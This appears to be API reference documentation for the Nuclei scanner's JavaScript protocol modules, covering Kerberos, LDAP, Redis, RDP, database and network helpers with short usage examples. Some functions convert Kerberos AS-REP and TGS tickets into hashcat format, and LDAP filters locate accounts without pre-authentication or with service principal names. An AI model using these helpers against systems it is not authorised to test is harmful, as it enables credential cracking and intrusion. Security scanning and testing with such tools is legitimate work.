| :----- | :------- |
| `path` | `string` |
#### Returns
`Uint8Array` | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const content = fs.ReadFile('helpers/usernames.txt');
```
#### Defined in
fs.ts:42
***
### ReadFileAsString
▸ **ReadFileAsString**(`path`): `string` | `null`
ReadFileAsString reads file contents within permitted paths
and returns content as string
#### Parameters
| Name | Type |
| :----- | :------- |
| `path` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const content = fs.ReadFileAsString('helpers/usernames.txt');
```
#### Defined in
fs.ts:58
***
### ReadFilesFromDir
▸ **ReadFilesFromDir**(`dir`): `string`\[] | `null`
ReadFilesFromDir reads all files from a directory
and returns a string array with file contents of all files
#### Parameters
| Name | Type |
| :---- | :------- |
| `dir` | `string` |
#### Returns
`string`\[] | `null`
**`Example`**
```javascript
const fs = require('nuclei/fs');
// here permitted directories are $HOME/nuclei-templates/*
const contents = fs.ReadFilesFromDir('helpers/ssh-keys');
log(contents);
```
#### Defined in
fs.ts:75
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ikev2
# Namespace: ikev2
## Table of contents
### Classes
* [IKEMessage](/templates/protocols/javascript/modules/ikev2.IKEMessage)
### Interfaces
* [IKENonce](/templates/protocols/javascript/modules/ikev2.IKENonce)
* [IKENotification](/templates/protocols/javascript/modules/ikev2.IKENotification)
### Variables
* [IKE\_EXCHANGE\_AUTH](/templates/protocols/javascript/modules/ikev2#ike_exchange_auth)
* [IKE\_EXCHANGE\_CREATE\_CHILD\_SA](/templates/protocols/javascript/modules/ikev2#ike_exchange_create_child_sa)
* [IKE\_EXCHANGE\_INFORMATIONAL](/templates/protocols/javascript/modules/ikev2#ike_exchange_informational)
* [IKE\_EXCHANGE\_SA\_INIT](/templates/protocols/javascript/modules/ikev2#ike_exchange_sa_init)
* [IKE\_FLAGS\_InitiatorBitCheck](/templates/protocols/javascript/modules/ikev2#ike_flags_initiatorbitcheck)
* [IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN](/templates/protocols/javascript/modules/ikev2#ike_notify_no_proposal_chosen)
* [IKE\_NOTIFY\_USE\_TRANSPORT\_MODE](/templates/protocols/javascript/modules/ikev2#ike_notify_use_transport_mode)
* [IKE\_VERSION\_2](/templates/protocols/javascript/modules/ikev2#ike_version_2)
## Variables
### IKE\_EXCHANGE\_AUTH
• `Const` **IKE\_EXCHANGE\_AUTH**: `35`
#### Defined in
ikev2.ts:4
***
### IKE\_EXCHANGE\_CREATE\_CHILD\_SA
• `Const` **IKE\_EXCHANGE\_CREATE\_CHILD\_SA**: `36`
#### Defined in
ikev2.ts:7
***
### IKE\_EXCHANGE\_INFORMATIONAL
• `Const` **IKE\_EXCHANGE\_INFORMATIONAL**: `37`
#### Defined in
ikev2.ts:10
***
### IKE\_EXCHANGE\_SA\_INIT
• `Const` **IKE\_EXCHANGE\_SA\_INIT**: `34`
#### Defined in
ikev2.ts:13
***
### IKE\_FLAGS\_InitiatorBitCheck
• `Const` **IKE\_FLAGS\_InitiatorBitCheck**: `8`
#### Defined in
ikev2.ts:16
***
### IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN
• `Const` **IKE\_NOTIFY\_NO\_PROPOSAL\_CHOSEN**: `14`
#### Defined in
ikev2.ts:19
***
### IKE\_NOTIFY\_USE\_TRANSPORT\_MODE
• `Const` **IKE\_NOTIFY\_USE\_TRANSPORT\_MODE**: `16391`
#### Defined in
ikev2.ts:22
***
### IKE\_VERSION\_2
• `Const` **IKE\_VERSION\_2**: `32`
#### Defined in
ikev2.ts:25
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/kerberos
# Namespace: kerberos
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/kerberos.Client)
* [Config](/templates/protocols/javascript/modules/kerberos.Config)
### Interfaces
* [AuthorizationDataEntry](/templates/protocols/javascript/modules/kerberos.AuthorizationDataEntry)
* [BitString](/templates/protocols/javascript/modules/kerberos.BitString)
* [EncTicketPart](/templates/protocols/javascript/modules/kerberos.EncTicketPart)
* [EncryptedData](/templates/protocols/javascript/modules/kerberos.EncryptedData)
* [EncryptionKey](/templates/protocols/javascript/modules/kerberos.EncryptionKey)
* [EnumerateUserResponse](/templates/protocols/javascript/modules/kerberos.EnumerateUserResponse)
* [HostAddress](/templates/protocols/javascript/modules/kerberos.HostAddress)
* [LibDefaults](/templates/protocols/javascript/modules/kerberos.LibDefaults)
* [PrincipalName](/templates/protocols/javascript/modules/kerberos.PrincipalName)
* [Realm](/templates/protocols/javascript/modules/kerberos.Realm)
* [TGS](/templates/protocols/javascript/modules/kerberos.TGS)
* [Ticket](/templates/protocols/javascript/modules/kerberos.Ticket)
* [TransitedEncoding](/templates/protocols/javascript/modules/kerberos.TransitedEncoding)
### Functions
* [ASRepToHashcat](/templates/protocols/javascript/modules/kerberos#asreptohashcat)
* [CheckKrbError](/templates/protocols/javascript/modules/kerberos#checkkrberror)
* [NewKerberosClientFromString](/templates/protocols/javascript/modules/kerberos#newkerberosclientfromstring)
* [SendToKDC](/templates/protocols/javascript/modules/kerberos#sendtokdc)
* [TGStoHashcat](/templates/protocols/javascript/modules/kerberos#tgstohashcat)
## Functions
### ASRepToHashcat
▸ **ASRepToHashcat**(`asrep`): `string` | `null`
ASRepToHashcat converts an AS-REP message to a hashcat format
#### Parameters
| Name | Type |
| :------ | :---- |
| `asrep` | `any` |
#### Returns
`string` | `null`
#### Defined in
kerberos.ts:6
***
### CheckKrbError
▸ **CheckKrbError**(`b`): `Uint8Array` | `null`
CheckKrbError checks if the response bytes from the KDC are a KRBError.
#### Parameters
| Name | Type |
| :--- | :----------- |
| `b` | `Uint8Array` |
#### Returns
`Uint8Array` | `null`
#### Defined in
kerberos.ts:15
***
### NewKerberosClientFromString
▸ **NewKerberosClientFromString**(`cfg`): [`Client`](/templates/protocols/javascript/modules/kerberos.Client) | `null`
NewKerberosClientFromString creates a new kerberos client from a string
by parsing krb5.conf
#### Parameters
| Name | Type |
| :---- | :------- |
| `cfg` | `string` |
#### Returns
[`Client`](/templates/protocols/javascript/modules/kerberos.Client) | `null`
**`Example`**
```javascript
const kerberos = require('nuclei/kerberos');
const client = kerberos.NewKerberosClientFromString(`
[libdefaults]
default_realm = ACME.COM
dns_lookup_kdc = true
`);
```
#### Defined in
kerberos.ts:34
***
### SendToKDC
▸ **SendToKDC**(`kclient`, `msg`): `string` | `null`
sendtokdc.go deals with actual sending and receiving responses from KDC
SendToKDC sends a message to the KDC and returns the response.
It first tries to send the message over TCP, and if that fails, it falls back to UDP (and vice versa).
#### Parameters
| Name | Type |
| :-------- | :------------------------------------------------------------------ |
| `kclient` | [`Client`](/templates/protocols/javascript/modules/kerberos.Client) |
| `msg` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const kerberos = require('nuclei/kerberos');
const client = new kerberos.Client('acme.com');
const response = kerberos.SendToKDC(client, 'message');
```
#### Defined in
kerberos.ts:51
***
### TGStoHashcat
▸ **TGStoHashcat**(`tgs`, `username`): `string` | `null`
TGStoHashcat converts a TGS to a hashcat format.
#### Parameters
| Name | Type |
| :--------- | :------- |
| `tgs` | `any` |
| `username` | `string` |
#### Returns
`string` | `null`
#### Defined in
kerberos.ts:60
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ldap
# Namespace: ldap
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/ldap.Client)
### Interfaces
* [Config](/templates/protocols/javascript/modules/ldap.Config)
* [LdapAttributes](/templates/protocols/javascript/modules/ldap.LdapAttributes)
* [LdapEntry](/templates/protocols/javascript/modules/ldap.LdapEntry)
* [Metadata](/templates/protocols/javascript/modules/ldap.Metadata)
* [SearchResult](/templates/protocols/javascript/modules/ldap.SearchResult)
### Variables
* [FilterAccountDisabled](/templates/protocols/javascript/modules/ldap#filteraccountdisabled)
* [FilterAccountEnabled](/templates/protocols/javascript/modules/ldap#filteraccountenabled)
* [FilterCanSendEncryptedPassword](/templates/protocols/javascript/modules/ldap#filtercansendencryptedpassword)
* [FilterDontExpirePassword](/templates/protocols/javascript/modules/ldap#filterdontexpirepassword)
* [FilterDontRequirePreauth](/templates/protocols/javascript/modules/ldap#filterdontrequirepreauth)
* [FilterHasServicePrincipalName](/templates/protocols/javascript/modules/ldap#filterhasserviceprincipalname)
* [FilterHomedirRequired](/templates/protocols/javascript/modules/ldap#filterhomedirrequired)
* [FilterInterdomainTrustAccount](/templates/protocols/javascript/modules/ldap#filterinterdomaintrustaccount)
* [FilterIsAdmin](/templates/protocols/javascript/modules/ldap#filterisadmin)
* [FilterIsComputer](/templates/protocols/javascript/modules/ldap#filteriscomputer)
* [FilterIsDuplicateAccount](/templates/protocols/javascript/modules/ldap#filterisduplicateaccount)
* [FilterIsGroup](/templates/protocols/javascript/modules/ldap#filterisgroup)
* [FilterIsNormalAccount](/templates/protocols/javascript/modules/ldap#filterisnormalaccount)
* [FilterIsPerson](/templates/protocols/javascript/modules/ldap#filterisperson)
* [FilterLockout](/templates/protocols/javascript/modules/ldap#filterlockout)
* [FilterLogonScript](/templates/protocols/javascript/modules/ldap#filterlogonscript)
* [FilterMnsLogonAccount](/templates/protocols/javascript/modules/ldap#filtermnslogonaccount)
* [FilterNotDelegated](/templates/protocols/javascript/modules/ldap#filternotdelegated)
* [FilterPartialSecretsAccount](/templates/protocols/javascript/modules/ldap#filterpartialsecretsaccount)
* [FilterPasswordCantChange](/templates/protocols/javascript/modules/ldap#filterpasswordcantchange)
* [FilterPasswordExpired](/templates/protocols/javascript/modules/ldap#filterpasswordexpired)
* [FilterPasswordNotRequired](/templates/protocols/javascript/modules/ldap#filterpasswordnotrequired)
* [FilterServerTrustAccount](/templates/protocols/javascript/modules/ldap#filterservertrustaccount)
* [FilterSmartCardRequired](/templates/protocols/javascript/modules/ldap#filtersmartcardrequired)
* [FilterTrustedForDelegation](/templates/protocols/javascript/modules/ldap#filtertrustedfordelegation)
* [FilterTrustedToAuthForDelegation](/templates/protocols/javascript/modules/ldap#filtertrustedtoauthfordelegation)
* [FilterUseDesKeyOnly](/templates/protocols/javascript/modules/ldap#filterusedeskeyonly)
* [FilterWorkstationTrustAccount](/templates/protocols/javascript/modules/ldap#filterworkstationtrustaccount)
### Functions
* [DecodeADTimestamp](/templates/protocols/javascript/modules/ldap#decodeadtimestamp)
* [DecodeSID](/templates/protocols/javascript/modules/ldap#decodesid)
* [DecodeZuluTimestamp](/templates/protocols/javascript/modules/ldap#decodezulutimestamp)
* [JoinFilters](/templates/protocols/javascript/modules/ldap#joinfilters)
* [NegativeFilter](/templates/protocols/javascript/modules/ldap#negativefilter)
## Variables
### FilterAccountDisabled
• `Const` **FilterAccountDisabled**: `"(userAccountControl:1.2.840.113556.1.4.803:=2)"`
The user account is disabled.
#### Defined in
ldap.ts:4
***
### FilterAccountEnabled
• `Const` **FilterAccountEnabled**: `"(!(userAccountControl:1.2.840.113556.1.4.803:=2))"`
The user account is enabled.
#### Defined in
ldap.ts:7
***
### FilterCanSendEncryptedPassword
• `Const` **FilterCanSendEncryptedPassword**: `"(userAccountControl:1.2.840.113556.1.4.803:=128)"`
The user can send an encrypted password.
#### Defined in
ldap.ts:10
***
### FilterDontExpirePassword
• `Const` **FilterDontExpirePassword**: `"(userAccountControl:1.2.840.113556.1.4.803:=65536)"`
Represents the password, which should never expire on the account.
#### Defined in
ldap.ts:13
***
### FilterDontRequirePreauth
• `Const` **FilterDontRequirePreauth**: `"(userAccountControl:1.2.840.113556.1.4.803:=4194304)"`
This account doesn't require Kerberos pre-authentication for logging on.
#### Defined in
ldap.ts:16
***
### FilterHasServicePrincipalName
• `Const` **FilterHasServicePrincipalName**: `"(servicePrincipalName=*)"`
The object has a service principal name.
#### Defined in
ldap.ts:19
***
### FilterHomedirRequired
• `Const` **FilterHomedirRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=8)"`
The home folder is required.
#### Defined in
ldap.ts:22
***
### FilterInterdomainTrustAccount
• `Const` **FilterInterdomainTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=2048)"`
It's a permit to trust an account for a system domain that trusts other domains.
#### Defined in
ldap.ts:25
***
### FilterIsAdmin
• `Const` **FilterIsAdmin**: `"(adminCount=1)"`
The object is an admin.
#### Defined in
ldap.ts:28
***
### FilterIsComputer
• `Const` **FilterIsComputer**: `"(objectCategory=computer)"`
The object is a computer.
#### Defined in
ldap.ts:31
***
### FilterIsDuplicateAccount
• `Const` **FilterIsDuplicateAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=256)"`
It's an account for users whose primary account is in another domain.
#### Defined in
ldap.ts:34
***
### FilterIsGroup
• `Const` **FilterIsGroup**: `"(objectCategory=group)"`
The object is a group.
#### Defined in
ldap.ts:37
***
### FilterIsNormalAccount
• `Const` **FilterIsNormalAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=512)"`
It's a default account type that represents a typical user.
#### Defined in
ldap.ts:40
***
### FilterIsPerson
• `Const` **FilterIsPerson**: `"(objectCategory=person)"`
The object is a person.
#### Defined in
ldap.ts:43
***
### FilterLockout
• `Const` **FilterLockout**: `"(userAccountControl:1.2.840.113556.1.4.803:=16)"`
The user is locked out.
#### Defined in
ldap.ts:46
***
### FilterLogonScript
• `Const` **FilterLogonScript**: `"(userAccountControl:1.2.840.113556.1.4.803:=1)"`
The logon script will be run.
#### Defined in
ldap.ts:49
***
### FilterMnsLogonAccount
• `Const` **FilterMnsLogonAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=131072)"`
It's an MNS logon account.
#### Defined in
ldap.ts:52
***
### FilterNotDelegated
• `Const` **FilterNotDelegated**: `"(userAccountControl:1.2.840.113556.1.4.803:=1048576)"`
When this flag is set, the security context of the user isn't delegated to a service even if the service account is set as trusted for Kerberos delegation.
#### Defined in
ldap.ts:55
***
### FilterPartialSecretsAccount
• `Const` **FilterPartialSecretsAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=67108864)"`
The account is a read-only domain controller (RODC).
#### Defined in
ldap.ts:58
***
### FilterPasswordCantChange
• `Const` **FilterPasswordCantChange**: `"(userAccountControl:1.2.840.113556.1.4.803:=64)"`
The user can't change the password.
#### Defined in
ldap.ts:61
***
### FilterPasswordExpired
• `Const` **FilterPasswordExpired**: `"(userAccountControl:1.2.840.113556.1.4.803:=8388608)"`
The user's password has expired.
#### Defined in
ldap.ts:64
***
### FilterPasswordNotRequired
• `Const` **FilterPasswordNotRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=32)"`
No password is required.
#### Defined in
ldap.ts:67
***
### FilterServerTrustAccount
• `Const` **FilterServerTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=8192)"`
It's a computer account for a domain controller that is a member of this domain.
#### Defined in
ldap.ts:70
***
### FilterSmartCardRequired
• `Const` **FilterSmartCardRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=262144)"`
When this flag is set, it forces the user to log on by using a smart card.
#### Defined in
ldap.ts:73
***
### FilterTrustedForDelegation
• `Const` **FilterTrustedForDelegation**: `"(userAccountControl:1.2.840.113556.1.4.803:=524288)"`
When this flag is set, the service account (the user or computer account) under which a service runs is trusted for Kerberos delegation.
#### Defined in
ldap.ts:76
***
### FilterTrustedToAuthForDelegation
• `Const` **FilterTrustedToAuthForDelegation**: `"(userAccountControl:1.2.840.113556.1.4.803:=16777216)"`
The account is enabled for delegation.
#### Defined in
ldap.ts:79
***
### FilterUseDesKeyOnly
• `Const` **FilterUseDesKeyOnly**: `"(userAccountControl:1.2.840.113556.1.4.803:=2097152)"`
Restrict this principal to use only Data Encryption Standard (DES) encryption types for keys.
#### Defined in
ldap.ts:82
***
### FilterWorkstationTrustAccount
• `Const` **FilterWorkstationTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=4096)"`
It's a computer account for a computer that is running old Windows builds.
#### Defined in
ldap.ts:85
## Functions
### DecodeADTimestamp
▸ **DecodeADTimestamp**(`timestamp`): `string`
DecodeADTimestamp decodes an Active Directory timestamp
#### Parameters
| Name | Type |
| :---------- | :------- |
| `timestamp` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const timestamp = ldap.DecodeADTimestamp('132036744000000000');
log(timestamp);
```
#### Defined in
ldap.ts:96
***
### DecodeSID
▸ **DecodeSID**(`s`): `string`
DecodeSID decodes a SID string
#### Parameters
| Name | Type |
| :--- | :------- |
| `s` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const sid = ldap.DecodeSID('S-1-5-21-3623811015-3361044348-30300820-1013');
log(sid);
```
#### Defined in
ldap.ts:111
***
### DecodeZuluTimestamp
▸ **DecodeZuluTimestamp**(`timestamp`): `string`
DecodeZuluTimestamp decodes a Zulu timestamp
#### Parameters
| Name | Type |
| :---------- | :------- |
| `timestamp` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const timestamp = ldap.DecodeZuluTimestamp('2021-08-25T10:00:00Z');
log(timestamp);
```
#### Defined in
ldap.ts:126
***
### JoinFilters
▸ **JoinFilters**(`filters`): `string`
JoinFilters joins multiple filters into a single filter
#### Parameters
| Name | Type |
| :-------- | :---- |
| `filters` | `any` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const filter = ldap.JoinFilters(ldap.FilterIsPerson, ldap.FilterAccountEnabled);
```
#### Defined in
ldap.ts:140
***
### NegativeFilter
▸ **NegativeFilter**(`filter`): `string`
NegativeFilter returns a negative filter for a given filter
#### Parameters
| Name | Type |
| :------- | :------- |
| `filter` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const filter = ldap.NegativeFilter(ldap.FilterIsPerson);
```
#### Defined in
ldap.ts:154
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/mssql
# Namespace: mssql
## Table of contents
### Classes
* [MSSQLClient](/templates/protocols/javascript/modules/mssql.MSSQLClient)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/mysql
# Namespace: mysql
## Table of contents
### Classes
* [MySQLClient](/templates/protocols/javascript/modules/mysql.MySQLClient)
### Interfaces
* [MySQLInfo](/templates/protocols/javascript/modules/mysql.MySQLInfo)
* [MySQLOptions](/templates/protocols/javascript/modules/mysql.MySQLOptions)
* [SQLResult](/templates/protocols/javascript/modules/mysql.SQLResult)
* [ServiceMySQL](/templates/protocols/javascript/modules/mysql.ServiceMySQL)
### Functions
* [BuildDSN](/templates/protocols/javascript/modules/mysql#builddsn)
## Functions
### BuildDSN
▸ **BuildDSN**(`opts`): `string` | `null`
BuildDSN builds a MySQL data source name (DSN) from the given options.
#### Parameters
| Name | Type |
| :----- | :--------------------------------------------------------------------------- |
| `opts` | [`MySQLOptions`](/templates/protocols/javascript/modules/mysql.MySQLOptions) |
#### Returns
`string` | `null`
**`Example`**
```javascript
const mysql = require('nuclei/mysql');
const options = new mysql.MySQLOptions();
options.Host = 'acme.com';
options.Port = 3306;
const dsn = mysql.BuildDSN(options);
```
#### Defined in
mysql.ts:14
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/net
# Namespace: net
## Table of contents
### Classes
* [NetConn](/templates/protocols/javascript/modules/net.NetConn)
### Functions
* [Open](/templates/protocols/javascript/modules/net#open)
* [OpenTLS](/templates/protocols/javascript/modules/net#opentls)
## Functions
### Open
▸ **Open**(`protocol`): [`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
Open opens a new connection to the address with a timeout.
supported protocols: tcp, udp
#### Parameters
| Name | Type |
| :--------- | :------- |
| `protocol` | `string` |
#### Returns
[`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
**`Example`**
```javascript
const net = require('nuclei/net');
const conn = net.Open('tcp', 'acme.com:80');
```
#### Defined in
net.ts:12
***
### OpenTLS
▸ **OpenTLS**(`protocol`): [`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
OpenTLS opens a new TLS connection to the address with a timeout.
supported protocols: tcp, udp
#### Parameters
| Name | Type |
| :--------- | :------- |
| `protocol` | `string` |
#### Returns
[`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
**`Example`**
```javascript
const net = require('nuclei/net');
const conn = net.OpenTLS('tcp', 'acme.com:443');
```
#### Defined in
net.ts:27
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/oracle
# Namespace: oracle
## Table of contents
### Interfaces
* [IsOracleResponse](/templates/protocols/javascript/modules/oracle.IsOracleResponse)
### Functions
* [IsOracle](/templates/protocols/javascript/modules/oracle#isoracle)
## Functions
### IsOracle
▸ **IsOracle**(`host`, `port`): [`IsOracleResponse`](/templates/protocols/javascript/modules/oracle.IsOracleResponse) | `null`
IsOracle checks if a host is running an Oracle server
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsOracleResponse`](/templates/protocols/javascript/modules/oracle.IsOracleResponse) | `null`
**`Example`**
```javascript
const oracle = require('nuclei/oracle');
const isOracle = oracle.IsOracle('acme.com', 1521);
log(toJSON(isOracle));
```
#### Defined in
oracle.ts:12
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/pop3
# Namespace: pop3
## Table of contents
### Interfaces
* [IsPOP3Response](/templates/protocols/javascript/modules/pop3.IsPOP3Response)
### Functions
* [IsPOP3](/templates/protocols/javascript/modules/pop3#ispop3)
## Functions
### IsPOP3
▸ **IsPOP3**(`host`, `port`): [`IsPOP3Response`](/templates/protocols/javascript/modules/pop3.IsPOP3Response) | `null`
IsPOP3 checks if a host is running a POP3 server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsPOP3Response`](/templates/protocols/javascript/modules/pop3.IsPOP3Response) | `null`
**`Example`**
```javascript
const pop3 = require('nuclei/pop3');
const isPOP3 = pop3.IsPOP3('acme.com', 110);
log(toJSON(isPOP3));
```
#### Defined in
pop3.ts:12
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/postgres
# Namespace: postgres
## Table of contents
### Classes
* [PGClient](/templates/protocols/javascript/modules/postgres.PGClient)
### Interfaces
* [SQLResult](/templates/protocols/javascript/modules/postgres.SQLResult)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/rdp
# Namespace: rdp
## Table of contents
### Interfaces
* [CheckRDPAuthResponse](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse)
* [IsRDPResponse](/templates/protocols/javascript/modules/rdp.IsRDPResponse)
* [ServiceRDP](/templates/protocols/javascript/modules/rdp.ServiceRDP)
### Functions
* [CheckRDPAuth](/templates/protocols/javascript/modules/rdp#checkrdpauth)
* [IsRDP](/templates/protocols/javascript/modules/rdp#isrdp)
## Functions
### CheckRDPAuth
▸ **CheckRDPAuth**(`host`, `port`): [`CheckRDPAuthResponse`](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse) | `null`
CheckRDPAuth checks if the given host and port are running rdp server
with authentication and returns their metadata.
If connection is successful, it returns true.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`CheckRDPAuthResponse`](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse) | `null`
**`Example`**
```javascript
const rdp = require('nuclei/rdp');
const checkRDPAuth = rdp.CheckRDPAuth('acme.com', 3389);
log(toJSON(checkRDPAuth));
```
#### Defined in
rdp.ts:14
***
### IsRDP
▸ **IsRDP**(`host`, `port`): [`IsRDPResponse`](/templates/protocols/javascript/modules/rdp.IsRDPResponse) | `null`
IsRDP checks if the given host and port are running rdp server.
If connection is successful, it returns true.
If connection is unsuccessful, it returns false and error.
The Name of the OS is also returned if the connection is successful.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsRDPResponse`](/templates/protocols/javascript/modules/rdp.IsRDPResponse) | `null`
**`Example`**
```javascript
const rdp = require('nuclei/rdp');
const isRDP = rdp.IsRDP('acme.com', 3389);
log(toJSON(isRDP));
```
#### Defined in
rdp.ts:32
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis
# Namespace: redis
## Table of contents
### Functions
* [Connect](/templates/protocols/javascript/modules/redis#connect)
* [GetServerInfo](/templates/protocols/javascript/modules/redis#getserverinfo)
* [GetServerInfoAuth](/templates/protocols/javascript/modules/redis#getserverinfoauth)
* [IsAuthenticated](/templates/protocols/javascript/modules/redis#isauthenticated)
* [RunLuaScript](/templates/protocols/javascript/modules/redis#runluascript)
## Functions
### Connect
▸ **Connect**(`host`, `port`, `password`): `boolean` | `null`
Connect tries to connect redis server with password
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
#### Returns
`boolean` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const connected = redis.Connect('acme.com', 6379, 'password');
```
#### Defined in
redis.ts:11
***
### GetServerInfo
▸ **GetServerInfo**(`host`, `port`): `string` | `null`
GetServerInfo returns the server info for a redis server
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const info = redis.GetServerInfo('acme.com', 6379);
```
#### Defined in
redis.ts:25
***
### GetServerInfoAuth
▸ **GetServerInfoAuth**(`host`, `port`, `password`): `string` | `null`
GetServerInfoAuth returns the server info for a redis server
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const info = redis.GetServerInfoAuth('acme.com', 6379, 'password');
```
#### Defined in
redis.ts:39
***
### IsAuthenticated
▸ **IsAuthenticated**(`host`, `port`): `boolean` | `null`
IsAuthenticated checks if the redis server requires authentication
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
`boolean` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const isAuthenticated = redis.IsAuthenticated('acme.com', 6379);
```
#### Defined in
redis.ts:53
***
### RunLuaScript
▸ **RunLuaScript**(`host`, `port`, `password`, `script`): `any` | `null`
RunLuaScript runs a lua script on the redis server
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
| `script` | `string` |
#### Returns
`any` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const result = redis.RunLuaScript('acme.com', 6379, 'password', 'return redis.call("get", KEYS[1])');
```
#### Defined in
redis.ts:67
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/rsync
# Namespace: rsync
## Table of contents
### Interfaces
* [IsRsyncResponse](/templates/protocols/javascript/modules/rsync.IsRsyncResponse)
### Functions
* [IsRsync](/templates/protocols/javascript/modules/rsync#isrsync)
## Functions
### IsRsync
▸ **IsRsync**(`host`, `port`): [`IsRsyncResponse`](/templates/protocols/javascript/modules/rsync.IsRsyncResponse) | `null`
IsRsync checks if a host is running a Rsync server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsRsyncResponse`](/templates/protocols/javascript/modules/rsync.IsRsyncResponse) | `null`
**`Example`**
```javascript
const rsync = require('nuclei/rsync');
const isRsync = rsync.IsRsync('acme.com', 873);
log(toJSON(isRsync));
```
#### Defined in
rsync.ts:12
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/smb
# Namespace: smb
## Table of contents
### Classes
* [SMBClient](/templates/protocols/javascript/modules/smb.SMBClient)
### Interfaces
* [HeaderLog](/templates/protocols/javascript/modules/smb.HeaderLog)
* [NegotiationLog](/templates/protocols/javascript/modules/smb.NegotiationLog)
* [SMBCapabilities](/templates/protocols/javascript/modules/smb.SMBCapabilities)
* [SMBLog](/templates/protocols/javascript/modules/smb.SMBLog)
* [SMBVersions](/templates/protocols/javascript/modules/smb.SMBVersions)
* [ServiceSMB](/templates/protocols/javascript/modules/smb.ServiceSMB)
* [SessionSetupLog](/templates/protocols/javascript/modules/smb.SessionSetupLog)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/smtp
# Namespace: smtp
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/smtp.Client)
* [SMTPMessage](/templates/protocols/javascript/modules/smtp.SMTPMessage)
### Interfaces
* [SMTPResponse](/templates/protocols/javascript/modules/smtp.SMTPResponse)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ssh
# Namespace: ssh
## Table of contents
### Classes
* [SSHClient](/templates/protocols/javascript/modules/ssh.SSHClient)
### Interfaces
* [Algorithms](/templates/protocols/javascript/modules/ssh.Algorithms)
* [DirectionAlgorithms](/templates/protocols/javascript/modules/ssh.DirectionAlgorithms)
* [EndpointId](/templates/protocols/javascript/modules/ssh.EndpointId)
* [HandshakeLog](/templates/protocols/javascript/modules/ssh.HandshakeLog)
* [KexInitMsg](/templates/protocols/javascript/modules/ssh.KexInitMsg)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/structs
# Namespace: structs
## Table of contents
### Functions
* [Pack](/templates/protocols/javascript/modules/structs#pack)
* [StructsCalcSize](/templates/protocols/javascript/modules/structs#structscalcsize)
* [Unpack](/templates/protocols/javascript/modules/structs#unpack)
## Functions
### Pack
▸ **Pack**(`formatStr`, `msg`): `Uint8Array` | `null`
StructsPack returns a byte slice containing the values of msg slice packed according to the given format.
